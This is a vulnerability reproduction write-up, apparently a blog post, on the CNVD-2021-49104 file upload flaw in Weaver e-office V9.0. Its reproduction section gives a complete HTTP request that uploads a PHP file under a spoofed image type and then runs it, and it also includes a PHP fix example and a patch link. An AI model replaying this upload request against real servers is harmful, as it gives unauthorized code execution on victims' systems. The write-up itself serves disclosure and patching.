CNVD-2021-49104 Vulnerability Reproduction (Weaver (Pan-Wei) E-Office File Upload Vulnerability)

1. Vulnerability detection script

A simple detection script I wrote myself; take a look if you are interested.


2. Vulnerability cause

This vulnerability is caused by the upload module of e-office failing to validate user input correctly. An attacker who can construct a malicious upload request can achieve arbitrary code execution. The official fix performs whitelist validation on the extension of the uploaded file. The following is the official code snippet after the vulnerability was fixed:
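As an added illustration (not the vendor's actual patch code, and not the page's own script), the following PHP contrasts a check that trusts the client-supplied Content-Type with a check that decides on the file's extension and stores the logo under a fixed base name plus a whitelisted suffix. Function names, the whitelist contents and the sample inputs are assumptions constructed for this example.

```php
<?php
// Weak check, matching the flawed behaviour described above: the MIME type sent by
// the client is trusted and the suffix is never inspected, so "test.php" uploaded
// with "Content-Type: image/jpeg" is accepted.
function weak_is_image(array $file): bool
{
    return strpos($file['type'], 'image/') === 0;
}

// Extension whitelist for the eoffice_logo upload (assumed list).
const ALLOWED_LOGO_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'bmp'];

// Hardened check: returns the validated extension, or null when the upload is rejected.
function validated_logo_extension(array $file): ?string
{
    // Only the final path component matters; strip directory parts and NUL bytes.
    $name = basename(str_replace("\0", '', $file['name']));
    // Lower-case the suffix so "logo.GIF" and "logo.gif" are treated alike.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, ALLOWED_LOGO_EXTENSIONS, true)) {
        return null;
    }
    // Secondary check: the bytes must decode as an image. A polyglot can still pass
    // this, which is why the stored name below never carries a script suffix.
    if (!is_file($file['tmp_name']) || @getimagesize($file['tmp_name']) === false) {
        return null;
    }
    return $ext;
}

// Build the stored name from a fixed base plus the validated suffix, so the
// request can never produce "logo-eoffice.php".
function stored_logo_name(array $file): ?string
{
    $ext = validated_logo_extension($file);
    return $ext === null ? null : 'logo-eoffice.' . $ext;
}

// Constructed demo inputs (not captured from a real system).
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, 'plain text, not an image');
$scriptUpload = ['name' => 'test.php', 'type' => 'image/jpeg', 'tmp_name' => $tmp];
var_dump(weak_is_image($scriptUpload));      // the weak check accepts the script
var_dump(stored_logo_name($scriptUpload));   // the hardened check rejects it
// A 1x1 GIF (base64) as a legitimate logo.
file_put_contents($tmp, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
$gifUpload = ['name' => 'logo.GIF', 'type' => 'image/gif', 'tmp_name' => $tmp];
var_dump(stored_logo_name($gifUpload));      // accepted and stored as logo-eoffice.gif
unlink($tmp);
```

On the server the validated name would be passed to move_uploaded_file(); the key point is that the suffix of the stored file comes from the whitelist, not from the request.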

3. Affected version

The version affected by this vulnerability is V9.0

4. Test environment setup

Just run the e-office installer you downloaded yourself.

The installer uses your own machine's default IP address and port number.


5. Vulnerability reproduction

Opening the site in a browser shows the following login page; the default account is admin with no password.

Capture the login request and its response, and note the PHPSESSID in the response. If you want to write a detection script you need this value, since it is the session identifier used for authentication.


Then capture a request from the logged-in page and modify it as shown below. If the response contains logo-eoffice.php, the upload succeeded.

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: win-08mtfbul1kp:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://win-08mtfbul1kp:8082/general/index9.php
Cookie: LOGIN_LANG=cn; PHPSESSID=e84040eb45cb321d9806d2e0518c1ba0
Content-Length: 194
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo();?>

--e64bdf16c554bbc109cecef6451c26a4--

Visit the following address:

http://win-08mtfbul1kp:8082/images/logo/logo-eoffice.php

You can see that the uploaded code runs successfully; you can also confirm the upload by checking the local folder on the server.


6. Remediation

The vendor has released a patch for this vulnerability; users are advised to download and apply it:

http://v10.e-office.cn/eoffice9update/safepack.zip


Source: blog.csdn.net/dreamthe/article/details/121729226